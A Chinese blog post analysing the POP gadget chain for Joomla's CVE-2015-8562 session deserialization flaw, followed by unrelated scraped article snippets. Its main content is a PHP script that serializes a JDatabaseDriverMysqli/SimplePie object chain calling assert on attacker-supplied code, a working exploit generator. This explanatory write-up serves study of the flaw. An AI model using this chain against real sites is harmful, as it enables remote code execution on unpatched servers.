Nophone
Nophone

CVE-2015-8562 POP链分析

紧接上篇文章

这篇文章来讲一讲CVE-2015-8562的POP链具体构造

0X00 前言

    emmm,首先CVE-2015-8562这个漏洞的成因这里简单复述以下,useragent字符串的内容会被存入session中,而且可利用版本下存在没有正确处理'|'的情况,导致恶意攻击者可以构造'|'的位置使name|payload这样的格式被存入session中。再通过构造的POP链达到漏洞利用。

0X01 POP链构造分析

这是本文的重点,如何构造该POP链

首先我们从别人提供的POC来看,在上文中我提到过程是JDatabaseDriverMysqli->__destruct->disconnect->call_user_func_array,然而该类中的call_user_func_array是无法控制的

publicfunctiondisconnect(){// Close the connection.

if($this->connection)

{foreach($this->disconnectHandlersas$h)

{call_user_func_array($h,array(&$this));}

mysqli_close($this->connection);}$this->connection=null;}


这时候把目光放在SimplePie类的init()函数中

$cache=call_user_func(array($this->cache_class,'create'),$this->cache_location,call_user_func($this->cache_name_function,$this->feed_url),'spc');

很明显第二个call_user_func_array的两个参数我们都是可以控制的将第一个参数赋值为assert,第二个为我们要执行的代码就构成了一个后门。

所以,整理一下我们需要满足的条件feed_url 存放我们想要执行的代码,cache_name_function存放"assert" 。disconnetHandlers存放$x和"init"。加上必要的函数不难得出我们的pop构造链。

//header("Content-Type: text/plain");

class JSimplepieFactory{}

class JDatabaseDriverMysql{}

class SimplePie{

    var $sanitize;

    var $cache;

    var $cache_name_function;

    var $javascript;

    var $feed_url;

    function__construct(){

        $this->feed_url="phpinfo();JFactory::getConfig();exit;";

        $this->javascript=9999;

        $this->cache_name_function="assert";

        $this->sanitize=newJDatabaseDriverMysql();

        $this->cache=true;

        }

}

class JDatabaseDriverMysqli{

    protected $a;

    protected $disconnectHandlers;

    protected $connection;

    function__construct(){

        $this->a=newJSimplepieFactory();

        $x=newSimplePie();

        $this->connection=1;

        $this->disconnectHandlers=[[$x,"init"],];

    }

}

$a=newJDatabaseDriverMysqli();

echoserialize($a);

你可能感兴趣的:(CVE-2015-8562 POP链分析)

  • 一文掌握python常用的list(列表)操作 程序员neil pythonpython开发语言
    目录一、创建列表1.直接创建列表:2.使用list()构造器3.使用列表推导式4.创建空列表二、访问列表元素1.列表支持通过索引访问元素,索引从0开始:2.还可以使用切片操作访问列表的一部分:三、修改列表元素四、添加元素1.append():在末尾添加元素2.insert():在指定位置插入元素五、删除元素1.del:删除指定位置的元素2.remove():删除指定值的第一个匹配项3.pop():
  • python结束子进程_如何清除python中的子进程 weixin_39995943 python结束子进程
    我们使用python进程来管理长时间运行的python子进程。有时需要终止子进程。kill命令不会完全终止进程,只会使其失效。运行以下脚本将演示此行为。importsubprocessp=subprocess.Popen(['sleep','400'],stdout=subprocess.PIPE,shell=False)或者p=subprocess.Popen('sleep400',stdout
  • el-table实现全选整表,单元一页复选框功能 周bro vue.jselementuijavascript前端
    全选整表单选一页0":popper-append-to-body="false":total="tableData.length":page-size="pageObj.pagesize":page-sizes="[10,50,100]"layout="total,sizes,prev,pager,next"@size-change="handleSizeChange"@current-chang
  • 网关gateway学习总结 猪猪365 学习总结学习总结
    一微服务概述:微服务网关就是一个系统!通过暴露该微服务的网关系统,方便我们进行相关的鉴权,安全控制,日志的统一处理,易于监控的相关功能!实现微服务网关技术都有哪些呢?1nginx:nginx是一个高性能的http和反向代理web的服务器,同事也提供了IMAP/POP3/SMTP服务.他可以支撑5万并发链接,并且cpu,内存等资源消耗非常的低,运行非常的稳定!2Zuul:Zuul是Netflix公司
  • Nginx:高性能的Web服务器与反向代理 张某布响丸辣 nginx前端服务器javaSpringBoot
    在当今的互联网世界中,Web服务器的选择对于网站的性能、稳定性和安全性至关重要。Nginx(发音为“engineX”)凭借其卓越的性能、丰富的功能集和灵活的配置选项,成为了众多网站和应用程序的首选Web服务器和反向代理。本文将深入探讨Nginx的特点、应用场景、基本配置以及它如何助力你的Web项目。Nginx简介Nginx是一个开源的、高性能的HTTP和反向代理服务器,也是一个IMAP/POP3/
  • Nginx Hard模式 西木风落 中间组件NginxNginx配置详解Nginx配置优化Nginx面试hard
    一、Nginx简介1.Nginx概述Nginx是一个免费、开源、高性能、轻量级的HTTP和反向代理服务器,也是一个电子邮件(IMAP/POP3)代理服务器。其特点是能支持高并发请求处理,并且占用较少的内存资源,提供稳定的、丰富的模块库,有很高的配置灵活性。目前,几乎所有的web项目,都配有Nginx。Nginx由内核和一系列模块组成,内核提供Web服务的基本功能,启用网路协议、提供运行环境、创建连
  • 栈区-----顺序栈------队列 (笑)z 数据结构
    栈栈(Stack)是一种遵循后进先出(LIFO,LastInFirstOut)原则的有序集合。这种数据结构只允许在栈顶进行添加(push)或删除(pop)元素的操作。换句话说,最新添加的元素会被最先移除。栈的这种特性使得它在多种编程和应用场景中非常有用,比如函数调用、括号匹配、表达式求值、页面访问历史等。只允许从一端进行数据的插入和删除的线性存储结构顺序栈:类似数组满增栈,满减栈,空增栈,空减栈空
  • python 卡方检验_Python-卡方检验 cunzai1985 pythonnumpy数据分析机器学习数据挖掘
    python卡方检验Python-卡方检验(Python-Chi-SquareTest)Chi-Squaretestisastatisticalmethodtodetermineiftwocategoricalvariableshaveasignificantcorrelationbetweenthem.Boththosevariablesshouldbefromsamepopulationand
  • 【WPF】Popup的使用 wangnaisheng C#WPFwpfc#
    WPF(WindowsPresentationFoundation)中的Popup控件用于创建弹出窗口,如工具提示、上下文菜单等。Popup控件本身并不直接显示任何内容,它需要一个子元素来显示实际的内容。以下是一个简单的XAML示例,展示如何创建一个点击按钮后出现的弹出窗口:1.前台界面2.后台逻辑需要为按钮的点击事件编写处理程序,以控制Popup的打开和关闭状态:usingSystem.Wind
  • pytorch安装(windows) m0_62244898 windows人工智能
    (1)下载pycharmPyCharm:thePythonIDEforProfessionalDevelopersbyJetBrains(2)下载anacondaAnaconda|TheWorld'sMostPopularDataSciencePlatform(3)创建一个新环境:torchcondacreate-ntorch-y(4)进入新环境condaactivatetorch(5)加入清华源
  • java迷宫问题 华为_深度优先搜索——迷宫问题(华为oj) 刘洛希 java迷宫问题华为
    题目描述:定义一个二维数组N*M(其中2=n)38continue;39if(a[tx][ty]==0&&book[tx][ty]==0)40{41xy.x=tx;42xy.y=ty;43way.push_back(xy);44book[tx][ty]=1;45dfs(tx,ty,step+1);46book[tx][ty]=0;47way.pop_back();48}49}50return0;5
  • 【C++】手把手教你写出自己的vector类 Ornamrr C++c++vector
    在上一篇博客中,我们学习了vector的基本使用,以及迭代器的失效问题:【C++】深入理解vector类(一)今天我们来模拟实现以下vector类。目录成员变量接口实现构造函数迭代器拷贝构造赋值reserveresizepush_backpop_back实现[]访问成员变量我们先从原码中找出其成员变量:可以看到,原码中有三个成员变量:startfinishend_of_storage数据类型是it
  • iOS—push和present区别(含dismiss多级的方法) Fttt.
    push和present都可以推出新的页面,present推出的是模态视图。present一般用于不同业务界面的切换,push一般用于同一业务不同界面之间的切换present与dismiss对应,push和pop对应。present只能逐级返回,push所有视图由视图栈控制,可以返回上一级,也可以返回到根视图、其他视图。push方法NextViewController*next=[[NextVie
  • JavaScript数组操作方法 柒一柒
    JavaScript数组操作方法常见的一些数组操作push、pop、unshift、shiftpush语法:array.push(item1,item2,…,itemX)push()方法:可以将一个或者更多的参数添加在数组的尾部;返回添加后的数组的长度,原数组发生改变。代码示例如下:vararr=[1,2,3,4];vara=arr.push(9,8,7);console.log(a,arr);/
  • 【前端UI框架】VUE ElementUI 离线文档 可不联网打开 我是Superman丶 前端组件前端vue.jselementui
    【前端UI框架】VUEElementUI离线文档可不联网打开Element-Theworld'smostpopularVueUIframeworkElement-Theworld'smostpopularVueUIframework离线文档下载地址https://download.csdn.net/download/G971005287W/89742895文档制作第一步:克隆源代码Gitee地址:
  • 遗传算法(Genetic Algorithm,GA)-基于MATLAB环境实现 朱佩棋(代码版) 启发式算法启发式算法算法matlab
    1.GA简介geneticalgorithm,美国Holland教授创立,基于达尔文进化论和孟德尔的遗传学说。遗传算法类比了生物界中自然选择、交叉、变异等自然进化方式,利用数码串类比染色体,通过选择、交叉、变异等遗传算子模拟生物的进化过程。1.1遗传算法的流程1.编码伪代码:2.产生初始群体Chooseinitialpopulation3.计算适应度Evaluatethefitnessofeach
  • 面向对象和面向过程(详解) 姜太公钓鲸233 c++开发语言
    面向对象编程(OOP)和面向过程编程(POP)是两种不同的编程范式,它们在组织代码和解决问题的方式上有着显著的区别。面向过程(ProcedureOriented简称PO):把事情拆分成几个步骤(相当于拆分成一个个的方法和数据),然后按照一定的顺序执行。面向对象(ObjectOriented简称OO):面向对象会把事物抽象成对象的概念,先抽象出对象,然后给对象赋一些属性和方法,然后让每个对象去执行自
  • 鸿蒙 - 数组常用的API �皓月�488 前端鸿蒙开发语言
    push()-在数组末尾添加一个或多个元素,并返回新的长度。pop()-删除数组的最后一个元素,并返回那个元素。shift()-删除数组的第一个元素,并返回那个元素。unshift()-在数组的开始添加一个或多个元素,并返回新的长度。slice()-返回数组的一个浅拷贝。splice()-通过删除现有元素和/或添加新元素来更改一个数组的内容。concat()-连接两个或更多数组,并返回一个新数组。
  • List集合特点,遍历方式,ArrayList(去重原理,增长因子论,LinkedList) 2401_86367086 面试辅导大厂内推listwindows数据结构
    for(inti=0;i();Dld=newDl(list);d.push(“a”);d.push(“b”);d.push(“c”);/**队列的特点先进先出一次只能取一个堆栈的特点反向输出*/System.out.println(d.pop());System.out.println(d.pop());System.out.println(d.pop());}}//队列classDl{Linke
  • Python 数据类型详解:列表、字典、元组与集合的操作指南 敲代码不忘补水 Python编码pythonwindows开发语言
    Python数据类型详解:列表、字典、元组与集合的操作指南文章目录Python数据类型详解:列表、字典、元组与集合的操作指南一List列表1获取List中多个数据2修改List对应位置的数据3List列表中的存储类型4其他功能1)扩充入另一个列表2)按位置添加3)移除某索引4)移除某值二Dict字典1其他功能1)按key获取对应的value2)将另一个字典补充到当前字典3)pop调一个item,和
  • synonym 11.08 rubine_zdy
    翻译:MujihasbeenasynonymforMinimalismandstraightdesign.例子:JayChouhasbeenasynonymforpopularmusicamongthosepost-90s’.
  • python调用shell命令-「Python」6种python中执行shell命令方法 weixin_37988176
    用Python调用Shell命令有如下几种方式:第一种:os.system("Thecommandyouwant").这个调用相当直接,且是同步进行的,程序需要阻塞并等待返回。返回值是依赖于系统的,直接返回系统的调用返回值,所以windows和linux是不一样的。第二种:os.popen(command[,mode[,bufsize]])先给大家看个例子可以看出,popen方法通过p.read(
  • 晓思的ScalersTalk第六轮《新概念》朗读持续力训练Day63—20210301 XS_XS
    【练习材料】(喜马拉雅新概念英音第二册)☞原文Lesson63ShewasnotamusedJeremyHampdenhasalargecircleoffriendsandisverypopularatparties.Everybodyadmireshimforhisgreatsenseofhumor--everybody,thatis,excepthissix-year-olddaughter,
  • 顺序表(SequenceList)数据结构的基本操作实现详解 SuchABigBug C语言数据结构链表c语言
    目录一、前言二、整体设计框架三、函数实现1.SeqListInit2.SeqListDestory3.SeqListCheckCapacity4.SeqListPushBack(尾插)5.SeqListPopBack(尾删)6.SeqListPushFront(头插)7.SeqListPopFront(头删)8.SeqlistFind9.SeqListInsert(任意位置插入)9.SeqList
  • Nginx 砌月东谷
    一、Nginx简介1.Nginx是什么??Nginx(enginex)是一个高性能的HTTP和反向代理服务器,也是一个IMAP/POP3/SMTP服务器?Nginx可以作为一个Web服务器进行网站的发布,也可以作为反向代理服务器进行负载均衡的实现?常见的Web服务器:Tomcat、Apache、Nginx、Weblogic等2.特点占用内存少、并发能力强二、搭建Nginx环境1.安装nginx?两
  • 夸夸我的同事 天父的娜娜宝贝
    今天晚上特别开心,虽然我一个家长也没到场全都请假了。因为突然认识到原来上帝把我放在一群宝贝中间。晚上Popy上的体验课,虽然是她第二次上课,但是真的超级棒。因为精彩的课程,来的家长和小孩子都很满意,自然报名也不错。Popy性格特别阳光自信,下午陪她练课的时候忍不住想夸她,不过我知道那是她生命本真的流露,就是发自内心的超级自信和有安全感。这个小女孩真好。虽然有点可惜可能她没办法久干,但是希望她在这里
  • windows安装openssh 大猫熊猫 openssh
    下载setupssh-9.8p1-1.exehttps://www.mls-software.com/opensshd.html安装完成后,会提示密码,记录cmd命令窗口,管理员权限打开#启动服务netstartopensshd#终止服务netstopopensshd用户名就是电脑的用户名
  • LeetCode LCR147.最小栈 A.A呐 Leetcode牛客题型leetcode算法c++
    LeetCodeLCR147.最小栈思路:建立两个栈,一个栈正常入栈出栈,一个栈只用于出入最小数,当push值小于minst栈顶才入栈,当pop值等于minst栈顶才出栈。代码:classMinStack{public:MinStack(){//自定义类型编译器会去调用相关构造}voidpush(intx){_st.push(x);if(_minst.empty()||x_st;stack_min
  • Python 字典(Dict)详解与实战应用 放屁给你暖手 热点python基础语法详解python开发语言
    目录前言一、字典的定义和创建1.使用花括号定义2.使用dict()函数创建二、字典的三种遍历方式方式1:遍历字典的键,通过键获取值dict.keys()方式2:遍历字典的值,但不能通过值获取键dict.values()方式3:最常用的方法:直接获取键值对dict.items()三、字典的常见操作1.添加2.删除pop()根据键删除键值对,并返回值popitem()默认删除最后一个键值对,并以元组的
  • ElementUI Cascader 级联选择器实现点击文本选中 阿程_88 #ElementUIelementui
    一、遇到的问题使用官方案例级联选择器时,只有点击前面小圆点才能选中,点击文本无法选中。二、需求级联选择器各层级都能选中,并且点击文本也能选中三、相关代码//级联选择器自定义浮层类名,实现前面单选框隐藏,点击文本即可选中功能.popper-custom{.el-cascader-panel{.el-cascader-menu{.el-radio{height:100%;width:150px;opa
  • jvm调优总结(从基本概念 到 深度优化) oloz javajvmjdk虚拟机应用服务器
    JVM参数详解:http://www.cnblogs.com/redcreen/archive/2011/05/04/2037057.html   Java虚拟机中,数据类型可以分为两类:基本类型和引用类型。基本类型的变量保存原始值,即:他代表的值就是数值本身;而引用类型的变量保存引用值。“引用值”代表了某个对象的引用,而不是对象本身,对象本身存放在这个引用值所表示的地址的位置。
  • 【Scala十六】Scala核心十:柯里化函数 bit1129 scala
    本篇文章重点说明什么是函数柯里化,这个语法现象的背后动机是什么,有什么样的应用场景,以及与部分应用函数(Partial Applied Function)之间的联系   1. 什么是柯里化函数 A way to write functions with multiple parameter lists. For instance def f(x: Int)(y: Int) is a
  • HashMap dalan_123 java
    HashMap在java中对很多人来说都是熟的;基于hash表的map接口的非同步实现。允许使用null和null键;同时不能保证元素的顺序;也就是从来都不保证其中的元素的顺序恒久不变。 1、数据结构     在java中,最基本的数据结构无外乎:数组 和 引用(指针),所有的数据结构都可以用这两个来构造,HashMap也不例外,归根到底HashMap就是一个链表散列的数据
  • Java Swing如何实时刷新JTextArea,以显示刚才加append的内容 周凡杨 java更新swingJTextArea
    在代码中执行完textArea.append("message")后,如果你想让这个更新立刻显示在界面上而不是等swing的主线程返回后刷新,我们一般会在该语句后调用textArea.invalidate()和textArea.repaint()。 问题是这个方法并不能有任何效果,textArea的内容没有任何变化,这或许是swing的一个bug,有一个笨拙的办法可以实现
  • servlet或struts的Action处理ajax请求 g21121 servlet
    其实处理ajax的请求非常简单,直接看代码就行了: //如果用的是struts //HttpServletResponse response = ServletActionContext.getResponse(); // 设置输出为文字流 response.setContentType("text/plain"); // 设置字符集 res
  • FineReport的公式编辑框的语法简介 老A不折腾 finereport公式总结
    FINEREPORT用到公式的地方非常多,单元格(以=开头的便被解析为公式),条件显示,数据字典,报表填报属性值定义,图表标题,轴定义,页眉页脚,甚至单元格的其他属性中的鼠标悬浮提示内容都可以写公式。 简单的说下自己感觉的公式要注意的几个地方:   1.if语句语法刚接触感觉比较奇怪,if(条件式子,值1,值2),if可以嵌套,if(条件式子1,值1,if(条件式子2,值2,值3)
  • linux mysql 数据库乱码的解决办法 墙头上一根草 linuxmysql数据库乱码
    linux 上mysql数据库区分大小写的配置 lower_case_table_names=1 1-不区分大小写 0-区分大小写   修改/etc/my.cnf 具体的修改内容如下:   [client] default-character-set=utf8   [mysqld] datadir=/var/lib/mysql socket=/va
  • 我的spring学习笔记6-ApplicationContext实例化的参数兼容思想 aijuans Spring 3
    ApplicationContext能读取多个Bean定义文件,方法是: ApplicationContext appContext = new ClassPathXmlApplicationContext( new String[]{“bean-config1.xml”,“bean-config2.xml”,“bean-config3.xml”,“bean-config4.xml
  • mysql 基准测试之sysbench annan211 基准测试mysql基准测试MySQL测试sysbench
    1 执行如下命令,安装sysbench-0.5: tar xzvf sysbench-0.5.tar.gz  cd sysbench-0.5  chmod +x autogen.sh  ./autogen.sh  ./configure --with-mysql --with-mysql-includes=/usr/local/mysql
  • sql的复杂查询使用案列与技巧 百合不是茶 oraclesql函数数据分页合并查询
      本片博客使用的数据库表是oracle中的scott用户表;          -------------------  自然连接查询           查询 smith 的上司(两种方法) &
  • 深入学习Thread类 bijian1013 javathread多线程java多线程
    一.             线程的名字 下面来看一下Thread类的name属性,它的类型是String。它其实就是线程的名字。在Thread类中,有String getName()和void setName(String)两个方法用来设置和获取这个属性的值。 同时,Thr
  • JSON串转换成Map以及如何转换到对应的数据类型 bijian1013 javafastjsonnet.sf.json
            在实际开发中,难免会碰到JSON串转换成Map的情况,下面来看看这方面的实例。另外,由于fastjson只支持JDK1.5及以上版本,因此在JDK1.4的项目中可以采用net.sf.json来处理。 一.fastjson实例 JsonUtil.java package com.study; impor
  • 【RPC框架HttpInvoker一】HttpInvoker:Spring自带RPC框架 bit1129 spring
    HttpInvoker是Spring原生的RPC调用框架,HttpInvoker同Burlap和Hessian一样,提供了一致的服务Exporter以及客户端的服务代理工厂Bean,这篇文章主要是复制粘贴了Hessian与Spring集成一文,【RPC框架Hessian四】Hessian与Spring集成   在 【RPC框架Hessian二】Hessian 对象序列化和反序列化一文中
  • 【Mahout二】基于Mahout CBayes算法的20newsgroup的脚本分析 bit1129 Mahout
    #!/bin/bash # # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information re
  • nginx三种获取用户真实ip的方法 ronin47
    随着nginx的迅速崛起,越来越多公司将apache更换成nginx. 同时也越来越多人使用nginx作为负载均衡, 并且代理前面可能还加上了CDN加速,但是随之也遇到一个问题:nginx如何获取用户的真实IP地址,如果后端是apache,请跳转到<apache获取用户真实IP地址>,如果是后端真实服务器是nginx,那么继续往下看。 实例环境: 用户IP 120.22.11.11
  • java-判断二叉树是不是平衡 bylijinnan java
    参考了 http://zhedahht.blog.163.com/blog/static/25411174201142733927831/ 但是用java来实现有一个问题。 由于Java无法像C那样“传递参数的地址,函数返回时能得到参数的值”,唯有新建一个辅助类:AuxClass import ljn.help.*; public class BalancedBTree {
  • BeanUtils.copyProperties VS PropertyUtils.copyProperties 诸葛不亮 PropertyUtilsBeanUtils
     BeanUtils.copyProperties VS  PropertyUtils.copyProperties  作为两个bean属性copy的工具类,他们被广泛使用,同时也很容易误用,给人造成困然;比如:昨天发现同事在使用BeanUtils.copyProperties copy有integer类型属性的bean时,没有考虑到会将null转换为0,而后面的业
  • [金融与信息安全]最简单的数据结构最安全 comsci 数据结构
          现在最流行的数据库的数据存储文件都具有复杂的文件头格式,用操作系统的记事本软件是无法正常浏览的,这样的情况会有什么问题呢?        从信息安全的角度来看,如果我们数据库系统仅仅把这种格式的数据文件做异地备份,如果相同版本的所有数据库管理系统都同时被攻击,那么
  • vi区段删除 Cwind linuxvi区段删除
    区段删除是编辑和分析一些冗长的配置文件或日志文件时比较常用的操作。简记下vi区段删除要点备忘。   vi概述    引文中并未将末行模式单独列为一种模式。单不单列并不重要,能区分命令模式与末行模式即可。   vi区段删除步骤: 1. 在末行模式下使用:set nu显示行号 非必须,随光标移动vi右下角也会显示行号,能够正确找到并记录删除开始行
  • 清除tomcat缓存的方法总结 dashuaifu tomcat缓存
    用tomcat容器,大家可能会发现这样的问题,修改jsp文件后,但用IE打开 依然是以前的Jsp的页面。 出现这种现象的原因主要是tomcat缓存的原因。 解决办法如下: 在jsp文件头加上 <meta http-equiv="Expires" content="0"> <meta http-equiv="kiben&qu
  • 不要盲目的在项目中使用LESS CSS dcj3sjt126com Webless
     如果你还不知道LESS CSS是什么东西,可以看一下这篇文章,是我一朋友写给新人看的《CSS——LESS》   不可否认,LESS CSS是个强大的工具,它弥补了css没有变量、无法运算等一些“先天缺陷”,但它似乎给我一种错觉,就是为了功能而实现功能。   比如它的引用功能 ? .rounded_corners{     
  • [入门]更上一层楼 dcj3sjt126com PHPyii2
    更上一层楼 通篇阅读完整个“入门”部分,你就完成了一个完整 Yii 应用的创建。在此过程中你学到了如何实现一些常用功能,例如通过 HTML 表单从用户那获取数据,从数据库中获取数据并以分页形式显示。你还学到了如何通过 Gii 去自动生成代码。使用 Gii 生成代码把 Web 开发中多数繁杂的过程转化为仅仅填写几个表单就行。 本章将介绍一些有助于更好使用 Yii 的资源:
  • Apache HttpClient使用详解 eksliang httpclienthttp协议
    Http协议的重要性相信不用我多说了,HttpClient相比传统JDK自带的URLConnection,增加了易用性和灵活性(具体区别,日后我们再讨论),它不仅是客户端发送Http请求变得容易,而且也方便了开发人员测试接口(基于Http协议的),即提高了开发的效率,也方便提高代码的健壮性。因此熟练掌握HttpClient是很重要的必修内容,掌握HttpClient后,相信对于Http协议的了解会
  • zxing二维码扫描功能 gundumw100 androidzxing
    经常要用到二维码扫描功能 现给出示例代码 import com.google.zxing.WriterException; import com.zxing.activity.CaptureActivity; import com.zxing.encoding.EncodingHandler; import android.app.Activity; import an
  • 纯HTML+CSS带说明的黄色导航菜单 ini htmlWebhtml5csshovertree
    HoverTree带说明的CSS菜单:纯HTML+CSS结构链接带说明的黄色导航   在线体验效果:http://hovertree.com/texiao/css/1.htm代码如下,保存到HTML文件可以看到效果:   <!DOCTYPE html > <html > <head> <title>HoverTree
  • fastjson初始化对性能的影响 kane_xie fastjson序列化
    之前在项目中序列化是用thrift,性能一般,而且需要用编译器生成新的类,在序列化和反序列化的时候感觉很繁琐,因此想转到json阵营。对比了jackson,gson等框架之后,决定用fastjson,为什么呢,因为看名字感觉很快。。。   网上的说法:   fastjson 是一个性能很好的 Java 语言实现的 JSON 解析器和生成器,来自阿里巴巴的工程师开发。
  • 基于Mybatis封装的增删改查实现通用自动化sql mengqingyu DAO
    1.基于map或javaBean的增删改查可实现不写dao接口和实现类以及xml,有效的提高开发速度。 2.支持自定义注解包括主键生成、列重复验证、列名、表名等 3.支持批量插入、批量更新、批量删除 <bean id="dynamicSqlSessionTemplate" class="com.mqy.mybatis.support.Dynamic
  • js控制input输入框的方法封装(数字,中文,字母,浮点数等) qifeifei javascript js
    在项目开发的时候,经常有一些输入框,控制输入的格式,而不是等输入好了再去检查格式,格式错了就报错,体验不好。 /** 数字,中文,字母,浮点数(+/-/.) 类型输入限制,只要在input标签上加上 jInput="number,chinese,alphabet,floating" 备注:floating属性只能单独用*/     funct
  • java 计时器应用 tangqi609567707 javatimer
    mport java.util.TimerTask;   import java.util.Calendar;   public class MyTask extends TimerTask {        private static final int
  • erlang输出调用栈信息 wudixiaotie erlang
    在erlang otp的开发中,如果调用第三方的应用,会有有些错误会不打印栈信息,因为有可能第三方应用会catch然后输出自己的错误信息,所以对排查bug有很大的阻碍,这样就要求我们自己打印调用的栈信息。用这个函数:erlang:process_display (self (), backtrace).需要注意这个函数只会输出到标准错误输出。 也可以用这个函数:erlang:get_s
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他